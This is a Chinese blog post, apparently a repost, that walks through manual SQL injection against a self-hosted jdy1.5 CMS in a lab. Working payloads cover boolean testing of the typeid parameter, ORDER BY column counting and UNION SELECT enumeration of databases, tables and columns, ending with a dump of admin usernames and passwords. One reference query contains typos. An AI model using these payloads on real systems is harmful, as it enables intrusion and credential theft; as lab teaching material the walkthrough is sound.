码迷,mamicode.com
首页 > 数据库 > 详细

SQL注入实战---jdy1.5

时间:2020-05-02 00:03:49      阅读:148      评论:0      收藏:0      [点我收藏+]

标签:数据库   order   操作   eid   输入   select   use   password   windows   

环境搭建

  • 这里使用的windows2003+phpstudy2018+sdy1.5
  • 我们解压sdy1.5至phpstudy下WWW文件内,在浏览器中输入127.0.0.1/sdy1.5进行安装
  • 技术图片
     
  • 然后就进入到了首页
  • 技术图片

     

     

  •  

 

1.观察当前页面的URL:http://192.168.50.100/jdy1.5/typeid.php?typeid=2

我们发现此处的typeid特别像此前sql-lab中的id参数,可以尝试一下注入。
输入命令:  ?typeid=2 and 1=1
观察到页面没有变化

技术图片

 

 

 

输入命令: ?typeid=2 and 1=2
此时我们观察出与以前的页面发生了变化,可以断定此处存在 数字型的SQL注入。(所以不用考虑参数闭合的问题)

技术图片

 

 

 2.

    • 此时,根据往常的思路,我们通过order by 语句判断出数据库的列数。
      输入命令:?typeid =2  order by 5
                        ?typeid = 2  order by 6
      5正常回显,6错误回显,判断出列数为5.
      技术图片3、我们以联合查询(union select)为例,观察回显位置。

技术图片

 

 

 

 

4、  构造语句 查看当前数据库

 

 

 

 

技术图片

 

 

 

在进行爆库爆表等等操作之前,先来回忆一下这些核心语句。
information_schema 系统默认数据库
三个重要的表
schemata(schema_name)
tables(table_schema,table_name)
columns(table_schema,table_name,column_name)


select schema_name from information_schema.schemata; 爆库
select table_name from information_schema.shcemata where table_schema=‘dvwa‘; 爆表
select column_name from information_schema.columns where table_name=‘users‘ and colunm_name =‘dvwa‘;爆列
select username,password from dvwa.users;爆内容

4、爆库

union  select 1,group_concat(schema_name),3,4,5 from information_schema.schemata

技术图片

 

 

 

 

6、爆表

union  select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0x6a6479636d73

此时数据库jdycm   不可以直接使用    需要将其转换成十六进制或者依旧用datbase()代替。

技术图片

 

技术图片

 

 

 

表名如下:
jdy_admin,jdy_kh,jdy_leavewords,jdy_newscontent,jdy_newstype,jdy_settings

 

7\、爆列

union  select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database() and table_name=0x6a64795f61646d696e

技术图片

 

 

 

 

 

列名  id,username,password,qx,addtime

 

 

 

 

8、爆字段 union select 1,group_concat(username,0x7e,password),3,4,5 from jdycms.jdy_admin

技术图片

 

 

 

 

 

 

 

 

 

SQL注入实战---jdy1.5

标签:数据库   order   操作   eid   输入   select   use   password   windows   

原文地址:https://www.cnblogs.com/xingyuner/p/12815189.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!